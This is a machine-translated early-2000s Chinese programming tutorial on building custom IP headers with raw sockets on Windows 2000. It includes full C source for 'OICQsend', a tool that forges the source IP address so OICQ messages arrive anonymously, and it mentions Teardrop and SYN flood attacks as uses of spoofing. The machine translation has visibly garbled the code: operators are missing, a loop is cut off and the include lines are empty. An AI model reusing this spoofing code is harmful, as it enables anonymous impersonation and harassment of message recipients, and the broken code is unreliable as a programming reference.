Implementation of User Custom IP Headers in WIN2000 and OICQsend Full Exemplar

zhaozj2021-02-08  229

Implementation of User Custom IP Headers in WIN2000 and OICQsend Full Exemplar

BY

Lonely swordsman

E-mail: Janker@371.net homepage: http://janker.126.com

First, the primer

Not long ago, I wrote a "personal Internet user self-protection manual", in detail, in detail, how to build a secure personal system and need to pay attention to problems when surfing online, etc., aimed to help The majority of Internet users learn to protect themselves online. Among them, I have mentioned the IP hidden problem, because the object of the article is mainly for general online users, so there is no detailed introduction, I didn't expect many netizens to be very interested, and I have a letter to discuss, so I've been close to this article, dedicated everyone.

Second, IP head structure

We know that all TCP / IP network data is all transmitted on the IP packet in the IP packet, which is packaged to establish an IP datagram containing IP headers and data. In general, network software always generates IP headers with multiple 32-bit words, even if IP headers must be filled with additional 0. The IP header contains all necessary information for transmitting the package data in the IP packet. The data structure and description of the IP header are as follows:

Member length (BIT) description

Version 4 IP header version number, currently IPv4, the latest IPv6

Header Length 4 IP header length, if there is no special choice, IP header is always 20-byte length

Type of Service 8 service type defines features such as priority, delay, throughput, and reliability of data transmission.

Total Packet Length 16 IP package length, if there is no special option, generally 20-byte length

Identification 16 IP package identifier, host uses it unique to determine each sending data report

Flag 3 IP Data Segmentation Sign

FRAGMENT OFFSET 13 IP Data Segmentation Offset

Time to Live 8 Data report on the survival time on the network, every passage, this value is reduced

Protocol 8 TCP / IP protocol type, such as: ICMP is 1, IGMP is 2, TCP is 6, UDP is 17, etc.

Header Checksum 16 head inspection and

Source IP Address 32 Source IP Address

Destination IP Address 32 Destination IP Address

Other? Other options

Data? Data

Implementing your own defined IP head is a very meaningful thing, for example, by changing the priority and TTL of TOS in the IP head, you can make your own data package with stronger transmission capabilities and life, by modifying IP headers The source IP address can hide the IP address of your machine, and the like. The famous attack program "Teardrop" is implemented by deliberately manufacturing a slice IP package that cannot be handled by the system, and SYN FLOODER and UDP FLOODER are deceived by generating random source IP.

Third, the principle of implementation

In general, custom IP headers are implemented by using Socket's library function setsockopt () option ip_hdrincl, although it is easy to implement on UNIX and Linux platforms, but unfortunately, Winsock1.1 and Winsock2 in Windows platforms. .0 function library setsockopt () does not support IP_HDRINCL options, so in Windows 9x / NT is unable to implement IP header from the WINSOCK library, of course, can be implemented by writing a virtual device driver, but it is more complicated, but The emergence of Windows 2000 breaks this situation, and Windows2000's Winsock 2.2 library fully supports setsockopt () option ip_hdrincl so that we can easily implement custom IP headers. The implementation method is as follows: Socket S;

Bool Bopt;

S = WSASOCKET (AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED);

Ret = setsockopt (s, ipproto_ip, ip_hdrincl, (char *) Bopt, SIZEOF (Bopt);

Fourth, instance

To help everyone learn to construct your IP header data as soon as possible, give a complete example, the functionality of the example is: Just give the other party IP address, you can send it to the other party OICQ a "Hello!" Message, and due to The IP header that sent the packet was modified, which fully implemented the sender IP address hidden, which means that you can make a complete anonymous OICQ sender, of course, if it is intentional, the consequences . The source code is as follows:

/ ************************************************** ********************* /

/ * OICQSEND.C * /

/ * This program compiled with Visual C 6.0 in Windows 2000 Advanced Server debugging via * /

/ * Created by janker@371.net 2000.8.28 * /

/ * Declaration: This procedure may generate an aggressive arbitrarily modified to attack programs at your own risk * /

/ ************************************************** ********************* /

#pragma pack (1)

#define Win32_Lean_and_mean

#include

#include

#include

#include

#include

#define oicq_max_packet 1024

#define OICQ_MAX_MSG 512

#define OICQ_MSG_LEN 45

#define SRC_IP "127.0.0.1"

#define SRC_Port 5277

#define DST_Port 4000

Typedef struct ip_hdr

{

UNSIGNED CHAR IP_VERLEN

Unsigned char ip_tos;

UNSIGNED SHORT IP_TOTALLENGTH;

UNSIGNED SHORT IP_ID;

UNSIGNED Short IP_offset;

Unsigned char ip_ttl; unsigned char ip_protocol;

UNSIGNED SHORT IP_CHECKSUM;

Unsigned int ip_srcaddr;

Unsigned int ip_destaddr;

Ip_hdr;

Typedef struct udp_hdr

{

UNSIGNED SHORT SRC_PORTNO;

UNSIGNED SHORT DST_PORTNO;

UNSIGNED SHORT UDP_LENGTH;

UNSIGNED SHORT UDP_CHECKSUM;

} Udp_hdr;

CHAR STRMESSAGE [OICQ_MSG_LEN] = {

0x02, 0x01, 0x07, 0x00, 0x78, 0x00, 0x00, 0x31, 0x30, 0x30, 0x30, 0x31, 0x1f, 0x30, 0x1f,

0x30, 0x30, 0x1f, 0x32, 0x30, 0x30, 0x30, 0x2d, 0x30, 0x31, 0x2d, 0x30, 0x31, 0x1f, 0x30,

0x30, 0x3a, 0x30, 0x30, 0x3a, 0x30, 0x30, 0x1f, 0x68, 0x65, 0x6c, 0x6c, 0x6f, 0x21, 0x03

}

Ushort Checksum (Ushort * Buffer, int size)

{

Unsigned long cksum = 0;

While (size> 1)

{

CKSUM = * Buffer ;

Size - = SizeOf (Ushort);

}

size

{

CKSUM = * (Uchar *) BUFFER;

}

CKSUM = (CKSUM >> 16) (CKSUM & 0xFFF);

CKSUM = (CKSUM >> 16);

Return (Ushort) (~ CKSUM);

}

INT main (int Argc, char ** argv)

{

WSADATA WSD;

Socket S;

Bool Bopt;

Struct SockAddr_in Remote;

IP_HDR IPHDR;

UDP_HDR UDPHDR;

int R;

DWORD I;

Unsigned short itotalsize,

Iudpsize,

IudpChecksumsize,

IIPVERSION,

IIPSIZE,

CKSUM = 0;

CHAR BUF [OICQ_MAX_PACKET],

* PTR = NULL;

Printf ("Spoof OICQ Msg Sender - by Janker@371.NET/N/N");

IF (argc! = 2) {

Printf ("USAGE: OICQSEND DESTINATION_IP_ADDRESS");

EXITPROCESS (1);

}

SRAND (NULL);

StrMessage [5] = rand ();

IF (WsaStartup (MakeWord (2, 2), & WSD)! = 0)

{

Printf ("WSAStartup () FAILED:% D / N", getLastError ());

Return -1;

}

s = WSASOCKET (AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, 0);

IF (s == invalid_socket)

{

Printf ("Wsasocket () FAILED:% D / N", wsagetlasterror ());

Return -1;

}

Bopt = true; ret = setsockopt (s, ipproto_ip, ip_hdrincl, (char *) & bopt, sizeof (bopt));

IF (RET == Socket_ERROR)

{

Printf ("SetSockopt (IP_HDRINCL) FAILED:% D / N", wsagetlasterror ());

Return -1;

}

ITOTALSIZE = SIZEOF (IPHDR) SIZEOF (UDPHDR) OICQ_MSG_LEN;

IIPVERSION = 4;

IIPSIZE = SizeOf (iPhdr) / sizeof (unsigned long);

iPhdr.ip_verlen = (IIPVERSION << 4) | IIPSIZE;

iphdr.ip_tos = 0;

iphdr.ip_totallength = htons (itotalsize);

iphdr.ip_id = 0;

iphdr.ip_offset = 0;

iphdr.ip_ttl = 128;

iphdr.ip_protocol = 0x11;

iphdr.ip_checksum = 0;

Iphdr.ip_srcaddr = inet_addr (src_ip);

iphdr.ip_destaddr = inet_addr (argv [1]);

Iudpsize = sizeof (udphdr) OICQ_MSG_Len;

Udphdr.src_portno = htons (src_port);

UDphdr.dst_portno = htons (dst_port);

Udphdr.udp_length = htons (iudpsize);

Udphdr.udp_checksum = 0;

IudpChecksumsize = 0;

PTR = BUF;

ZeromeMory (buf, OICQ_MAX_PACKET);

Memcpy (ptr, & iphdr.ip_srcaddr, sizeof (iphdr.ip_srcaddr));

PTR = SizeOf (iPhdr.ip_srcaddr);

IudpChecksumsize = sizeof (iPhdr.ip_srcaddr);

Memcpy (ptr, & iphdr.ip_destaddr, sizeof (iphdr.ip_destaddr));

PTR = SizeOf (iPhdr.ip_DestAddr);

Iudpchecksumsize = sizeof (iphdr.ip_destaddr);

PTR ;

IudpChecksumsize = 1;

Memcpy (PTR, & iPhdr.ip_protocol, sizeof (iphdr.ip_protocol);

PTR = SizeOf (iPhdr.ip_protocol);

Iudpchecksumsize = sizeof (iPhdr.ip_protocol);

Memcpy (PTR, & UDPHDR.UDP_LENGTH, SIZEOF (udphdr.udp_length));

PTR = SizeOf (udphdr.udp_length);

IudpChecksumsize = sizeof (udphdr.udp_length);

Memcpy (PTR, & UDPHDR, SIZEOF (UDPHDR)); PTR = SizeOf (UDphdr);

IudpChecksumsize = sizeof (udphdr);

For (i = 0; i

* PTR = StrMessage [i];

Iudpchecksumsize = OICQ_MSG_Len;

CKSUM = Checksum (USHORT *) BUF, IUDPCHECKSUMSIZE

Udphdr.udp_checksum = cksum;

ZeromeMory (buf, OICQ_MAX_PACKET);

PTR = BUF;

Memcpy (PTR, & iPhDR, SIZEOF (IPHDR)); PTR = SIZEOF (IPHDR);

Memcpy (PTR, & UDPHDR, SIZEOF (UDPHDR)); PTR = SizeOf (UDphdr);

Memcpy (PTR, STRMESSAGE, OICQ_MSG_LEN);

Remote.sin_family = af_INet;

Remote.sin_port = HTONS (DST_PORT);

Remote.sin_addr.s_addr = inet_addr (Argv [1]);

Ret = Sendto (S, BUF, ITOTALSIZE, 0, (SockAddr *) & remote, SizeOf (remote));

IF (RET == Socket_ERROR)

Printf ("Sendto () Failed:% D / N", wsagetlasterror ());

Else

Printf ("Send O.K.!");

CloseSocket (s);

WSACLEANUP ();

Return 0;

}

Please download the full source program and EXE file compression package OICQSEND.ZIP

Five, after

The instance OICQ data of this article is based on the "Network Monitor" of Windows 2000, which is a good network packet analysis tool, I hope everyone can use it.

bibliography:

"NetWork Programming for Microsoft Windows Author: Jim Ohlund, Microsoft Press.

转载请注明原文地址:https://www.9cbs.com/read-2020.html

New Post(0)